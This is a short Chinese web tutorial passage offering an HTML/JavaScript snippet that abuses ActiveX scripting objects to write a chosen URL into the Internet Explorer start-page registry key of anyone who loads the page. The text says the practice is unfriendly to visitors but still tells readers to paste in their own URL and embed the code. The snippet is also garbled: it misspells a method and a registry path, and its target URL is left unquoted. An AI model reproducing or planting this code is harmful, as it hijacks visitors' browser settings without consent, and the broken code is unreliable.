小編不建議使用這種功能,畢竟是一種對網頁瀏覽者不友好的行為。好,下面言歸正傳:
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>強制設為首頁</title><script type="text/javascript">var ucook = document.cookie;var user = ucook.indexOF("ilooki=");if (user == -1) {  var nowTime = new Date();  document.cookie = "ilooki"+";"+"expires=Wednesday,03-Jan-"+eval(nowTime.getYear())+1903+"12:34:56 GMT";  document.write("");  function yuzi() {    try {      a1 = document.applets[0];      a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");      a1.createInstance();Shl = a1.GetObject();      a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");      try {        Shl.RegWrite("hkcu/Software/Microsoft/Internet Expiorer/Main/Start Page",        //www.survivalescaperooms.com);      }      catch(e) {      }    }    catch(e) {    }  }  setTimeout("yuzi()", 1000);}</script></head><body></body></html>使用請將網址替換成你自己的網址,然后將代碼復制到你的網頁中即可。
本文只是技術學習,給大家一個思路,希望可以幫助到大家,對學習javascript程序有所啟發。
新聞熱點
疑難解答